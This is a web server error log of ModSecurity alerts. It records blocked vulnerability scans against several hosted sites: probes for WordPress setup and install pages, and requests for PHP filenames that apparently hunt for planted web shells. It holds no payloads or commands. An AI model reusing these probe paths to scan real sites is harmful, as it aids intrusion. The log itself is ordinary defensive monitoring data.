[Tue May 26 15:35:33.033080 2026] [security2:error] [pid 724639:tid 724815] [client 74.249.173.207:43442] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/wp.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CgQAAALM"]
[Tue May 26 15:35:33.186209 2026] [security2:error] [pid 724639:tid 724829] [client 54.205.63.235:51686] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wp-admin/setup-config.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CgwAAAME"]
[Tue May 26 15:35:33.295836 2026] [security2:error] [pid 724639:tid 724830] [client 54.205.63.235:52444] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wordpress/wp-admin/setup-config.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CjAAAAMI"]
[Tue May 26 15:35:33.295850 2026] [security2:error] [pid 724639:tid 724834] [client 54.205.63.235:52445] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/old/wp-admin/setup-config.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CjQAAAMY"]
[Tue May 26 15:35:33.296313 2026] [security2:error] [pid 724639:tid 724782] [client 54.205.63.235:52449] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/backup/wp-admin/setup-config.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CkAAAAJI"]
[Tue May 26 15:35:33.296343 2026] [security2:error] [pid 724639:tid 724817] [client 54.205.63.235:52447] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wordpress1/wp-admin/setup-config.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CjwAAALU"]
[Tue May 26 15:35:33.296384 2026] [security2:error] [pid 724639:tid 724862] [client 54.205.63.235:52453] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/staging/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CkgAAAOI"]
[Tue May 26 15:35:33.296500 2026] [security2:error] [pid 724639:tid 724798] [client 54.205.63.235:52452] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/old/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CkQAAAKI"]
[Tue May 26 15:35:33.296607 2026] [security2:error] [pid 724639:tid 724840] [client 54.205.63.235:52450] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2ClAAAAMw"]
[Tue May 26 15:35:33.296816 2026] [security2:error] [pid 724639:tid 724821] [client 54.205.63.235:52454] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wordpress1/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2ClQAAALk"]
[Tue May 26 15:35:33.297000 2026] [security2:error] [pid 724639:tid 724816] [client 54.205.63.235:52455] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wp/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2ClgAAALQ"]
[Tue May 26 15:35:33.297133 2026] [security2:error] [pid 724639:tid 724843] [client 54.205.63.235:52446] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wp/wp-admin/setup-config.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CjgAAAM8"]
[Tue May 26 15:35:33.297237 2026] [security2:error] [pid 724639:tid 724862] [client 54.205.63.235:52456] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/backup/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2ClwAAAOI"]
[Tue May 26 15:35:33.297297 2026] [security2:error] [pid 724639:tid 724889] [client 54.205.63.235:52451] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/wordpress/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CmAAAAP0"]
[Tue May 26 15:35:33.297368 2026] [security2:error] [pid 724639:tid 724839] [client 54.205.63.235:52448] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/staging/wp-admin/setup-config.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CkwAAAMs"]
[Tue May 26 15:35:33.297402 2026] [security2:error] [pid 724639:tid 724855] [client 54.205.63.235:52457] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/demo/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CmQAAANs"]
[Tue May 26 15:35:33.381087 2026] [security2:error] [pid 724639:tid 724807] [client 54.205.63.235:52579] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 235.63.205.54.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "d2cargo.com"] [uri "/test/wp-admin/install.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CmgAAAKs"]
[Tue May 26 15:35:33.615960 2026] [security2:error] [pid 724639:tid 724851] [client 74.249.173.207:37045] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/adminfuns.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CoQAAANc"]
[Tue May 26 15:35:33.616068 2026] [security2:error] [pid 724639:tid 724851] [client 74.249.173.207:37045] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/adminfuns.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CoQAAANc"]
[Tue May 26 15:35:33.907606 2026] [security2:error] [pid 724639:tid 724810] [client 74.249.173.207:35162] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/php8.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CpwAAAK4"]
[Tue May 26 15:35:33.907739 2026] [security2:error] [pid 724639:tid 724810] [client 74.249.173.207:35162] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/php8.php"] [unique_id "ahVwbRKJRbiNp3eWdT2CpwAAAK4"]
[Tue May 26 15:35:34.251086 2026] [security2:error] [pid 724639:tid 724853] [client 74.249.173.207:44260] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/ioxi-o.php"] [unique_id "ahVwbhKJRbiNp3eWdT2CtQAAANk"]
[Tue May 26 15:35:34.251187 2026] [security2:error] [pid 724639:tid 724853] [client 74.249.173.207:44260] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/ioxi-o.php"] [unique_id "ahVwbhKJRbiNp3eWdT2CtQAAANk"]
[Tue May 26 15:35:34.499065 2026] [security2:error] [pid 724639:tid 724805] [client 74.249.173.207:40635] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/edit.php"] [unique_id "ahVwbhKJRbiNp3eWdT2CuAAAAKk"]
[Tue May 26 15:35:34.499168 2026] [security2:error] [pid 724639:tid 724805] [client 74.249.173.207:40635] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/edit.php"] [unique_id "ahVwbhKJRbiNp3eWdT2CuAAAAKk"]
[Tue May 26 15:35:34.659606 2026] [security2:error] [pid 724639:tid 724892] [client 57.141.2.36:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwbhKJRbiNp3eWdT2CsQAAAQA"]
[Tue May 26 15:35:34.829557 2026] [security2:error] [pid 724639:tid 724840] [client 74.249.173.207:43424] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/sid3.php"] [unique_id "ahVwbhKJRbiNp3eWdT2CyQAAAMw"]
[Tue May 26 15:35:34.829675 2026] [security2:error] [pid 724639:tid 724840] [client 74.249.173.207:43424] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/sid3.php"] [unique_id "ahVwbhKJRbiNp3eWdT2CyQAAAMw"]
[Tue May 26 15:35:35.232256 2026] [security2:error] [pid 724639:tid 724784] [client 74.249.173.207:35161] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/166.php"] [unique_id "ahVwbxKJRbiNp3eWdT2C1AAAAJQ"]
[Tue May 26 15:35:35.232369 2026] [security2:error] [pid 724639:tid 724784] [client 74.249.173.207:35161] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/166.php"] [unique_id "ahVwbxKJRbiNp3eWdT2C1AAAAJQ"]
[Tue May 26 15:35:35.733693 2026] [security2:error] [pid 724639:tid 724798] [client 173.239.240.38:43397] ModSecurity: Access denied with code 406 (phase 1). Pattern match "^POST$" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "187"] [id "900401"] [msg "PHP Spam Botnet"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahVwbxKJRbiNp3eWdT2C2gAAAKI"]
[Tue May 26 15:35:35.733865 2026] [security2:error] [pid 724639:tid 724798] [client 173.239.240.38:43397] ModSecurity: Warning. Pattern match "POST" at REQUEST_METHOD. [file "/opt/mod_security/hg_rules.conf"] [line "155"] [id "900406"] [msg "wp-login POST logging"] [data "406"] [hostname "lifestylemne.me"] [uri "/wp-login.php"] [unique_id "ahVwbxKJRbiNp3eWdT2C2gAAAKI"]
[Tue May 26 15:35:35.883968 2026] [security2:error] [pid 724639:tid 724824] [client 74.249.173.207:28874] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/test.php"] [unique_id "ahVwbxKJRbiNp3eWdT2C4gAAALw"]
[Tue May 26 15:35:35.884091 2026] [security2:error] [pid 724639:tid 724824] [client 74.249.173.207:28874] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/test.php"] [unique_id "ahVwbxKJRbiNp3eWdT2C4gAAALw"]
[Tue May 26 15:35:36.230066 2026] [security2:error] [pid 724639:tid 724785] [client 74.249.173.207:1873] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/phpinfo/info.php"] [unique_id "ahVwcBKJRbiNp3eWdT2C7AAAAJU"]
[Tue May 26 15:35:36.230188 2026] [security2:error] [pid 724639:tid 724785] [client 74.249.173.207:1873] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/phpinfo/info.php"] [unique_id "ahVwcBKJRbiNp3eWdT2C7AAAAJU"]
[Tue May 26 15:35:36.678106 2026] [security2:error] [pid 724639:tid 724792] [client 74.249.173.207:37541] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/wp-the.php"] [unique_id "ahVwcBKJRbiNp3eWdT2C9wAAAJw"]
[Tue May 26 15:35:36.678229 2026] [security2:error] [pid 724639:tid 724792] [client 74.249.173.207:37541] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/wp-the.php"] [unique_id "ahVwcBKJRbiNp3eWdT2C9wAAAJw"]
[Tue May 26 15:35:36.752843 2026] [autoindex:error] [pid 724639:tid 724812] [client 129.211.229.121:60870] AH01276: Cannot serve directory /home1/newde164/public_html/: No matching DirectoryIndex (index.html.var,index.htm,index.html,index.shtml,index.xhtml,index.wml,index.perl,index.pl,index.plx,index.ppl,index.cgi,index.jsp,index.js,index.jp,index.php4,index.php3,index.php,index.phtml,default.htm,default.html,home.htm,index.php5,Default.html,Default.htm,home.html) found, and server-generated directory index forbidden by Options directive
[Tue May 26 15:35:37.141697 2026] [security2:error] [pid 724639:tid 724867] [client 57.141.2.3:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwcBKJRbiNp3eWdT2C-QAAAOc"]
[Tue May 26 15:35:37.345859 2026] [security2:error] [pid 724639:tid 724778] [client 74.249.173.207:37019] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/CDX2.php"] [unique_id "ahVwcRKJRbiNp3eWdT2DEAAAAI4"]
[Tue May 26 15:35:37.345969 2026] [security2:error] [pid 724639:tid 724778] [client 74.249.173.207:37019] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/CDX2.php"] [unique_id "ahVwcRKJRbiNp3eWdT2DEAAAAI4"]
[Tue May 26 15:35:37.369080 2026] [security2:error] [pid 724639:tid 724706] [remote 47.128.53.182:34168] ModSecurity: Access denied with code 406 (phase 1). Pattern match "ZoominfoBot|NetcraftSurveyAgent|MJ12bot|(?i:BUbiNG)|D(?i:otbot)| oBot/|MegaIndex\\\\.ru|Barkrowler|Spbot|DomainCrawler|Seznam|CCBot|SiteExplorer|OpenLinkProfiler|Sogou web spider|360Spider|Semrush|Panscient|crawler\\\\.feedback([+]\\\\S+)?@gmail\\\\.com|MauiBo ..." at REQUEST_HEADERS:User-Agent. [file "/opt/mod_security/hg_rules.conf"] [line "585"] [id "999812"] [msg "Problematic Crawler"] [hostname "cagmedya.com"] [uri "/"] [unique_id "ahVwcRKJRbiNp3eWdT2DEQAAtkI"]
[Tue May 26 15:35:37.691149 2026] [security2:error] [pid 724639:tid 724827] [client 74.249.173.207:38164] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/profile.php"] [unique_id "ahVwcRKJRbiNp3eWdT2DGAAAAL8"]
[Tue May 26 15:35:37.691322 2026] [security2:error] [pid 724639:tid 724827] [client 74.249.173.207:38164] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/profile.php"] [unique_id "ahVwcRKJRbiNp3eWdT2DGAAAAL8"]
[Tue May 26 15:35:38.373414 2026] [security2:error] [pid 724639:tid 724777] [client 74.249.173.207:35148] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/ws80.php"] [unique_id "ahVwchKJRbiNp3eWdT2DMAAAAI0"]
[Tue May 26 15:35:38.373545 2026] [security2:error] [pid 724639:tid 724777] [client 74.249.173.207:35148] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/ws80.php"] [unique_id "ahVwchKJRbiNp3eWdT2DMAAAAI0"]
[Tue May 26 15:35:38.817980 2026] [security2:error] [pid 724639:tid 724880] [client 57.141.2.27:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwchKJRbiNp3eWdT2DMwAAAPQ"]
[Tue May 26 15:35:39.010577 2026] [security2:error] [pid 724639:tid 724793] [client 74.249.173.207:37507] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/a4.php"] [unique_id "ahVwcxKJRbiNp3eWdT2DQgAAAJ0"]
[Tue May 26 15:35:39.010779 2026] [security2:error] [pid 724639:tid 724793] [client 74.249.173.207:37507] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/a4.php"] [unique_id "ahVwcxKJRbiNp3eWdT2DQgAAAJ0"]
[Tue May 26 15:35:39.457383 2026] [security2:error] [pid 724639:tid 724832] [client 74.249.173.207:40598] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/buy.php"] [unique_id "ahVwcxKJRbiNp3eWdT2DTwAAAMQ"]
[Tue May 26 15:35:39.457558 2026] [security2:error] [pid 724639:tid 724832] [client 74.249.173.207:40598] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/buy.php"] [unique_id "ahVwcxKJRbiNp3eWdT2DTwAAAMQ"]
[Tue May 26 15:35:39.912761 2026] [security2:error] [pid 724639:tid 724769] [client 74.249.173.207:37526] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/core.php"] [unique_id "ahVwcxKJRbiNp3eWdT2DVwAAAIU"]
[Tue May 26 15:35:39.912897 2026] [security2:error] [pid 724639:tid 724769] [client 74.249.173.207:37526] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/core.php"] [unique_id "ahVwcxKJRbiNp3eWdT2DVwAAAIU"]
[Tue May 26 15:35:40.148338 2026] [security2:error] [pid 724639:tid 724864] [client 74.249.173.207:41892] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/lock360.php"] [unique_id "ahVwdBKJRbiNp3eWdT2DXgAAAOQ"]
[Tue May 26 15:35:40.148411 2026] [security2:error] [pid 724639:tid 724864] [client 74.249.173.207:41892] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/lock360.php"] [unique_id "ahVwdBKJRbiNp3eWdT2DXgAAAOQ"]
[Tue May 26 15:35:40.522173 2026] [security2:error] [pid 724639:tid 724782] [client 74.249.173.207:44252] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/bc.php"] [unique_id "ahVwdBKJRbiNp3eWdT2DaQAAAJI"]
[Tue May 26 15:35:40.522261 2026] [security2:error] [pid 724639:tid 724782] [client 74.249.173.207:44252] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/bc.php"] [unique_id "ahVwdBKJRbiNp3eWdT2DaQAAAJI"]
[Tue May 26 15:35:40.951636 2026] [security2:error] [pid 724639:tid 724814] [client 57.141.2.54:0] ModSecurity: Warning. Pattern match "301|404|302" at RESPONSE_STATUS. [file "/opt/mod_security/hg_rules.conf"] [line "1570"] [id "900934"] [msg "404 php LOGGING"] [data "404"] [hostname "mosykay.com"] [uri "/index.php"] [unique_id "ahVwdBKJRbiNp3eWdT2DbAAAALI"]
[Tue May 26 15:35:40.963390 2026] [security2:error] [pid 724639:tid 724783] [client 74.249.173.207:37545] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/av.php"] [unique_id "ahVwdBKJRbiNp3eWdT2DeQAAAJM"]
[Tue May 26 15:35:40.963470 2026] [security2:error] [pid 724639:tid 724783] [client 74.249.173.207:37545] ModSecurity: Warning. Operator EQ matched 0 at REQUEST_HEADERS. [file "/opt/mod_security/hg_rules.conf"] [line "1573"] [id "900935"] [msg "Empty User-Agent LOGGING"] [data "409"] [hostname "rathnaa.co.in"] [uri "/av.php"] [unique_id "ahVwdBKJRbiNp3eWdT2DeQAAAJM"]
[Tue May 26 15:35:41.232684 2026] [security2:error] [pid 724639:tid 724875] [client 74.249.173.207:37532] ModSecurity: Access denied with code 409 (phase 1). RBL lookup of 207.173.249.74.vulnscan.websitewelcome.com succeeded at REMOTE_ADDR. [file "/opt/mod_security/hg_rules.conf"] [line "1566"] [id "900933"] [msg "Vulnerability Scan RBL: vulnscan.websitewelcome.com"] [hostname "rathnaa.co.in"] [uri "/xs.php"] [unique_id "ahVwdRKJRbiNp3eWdT2DfQAAAO8"]
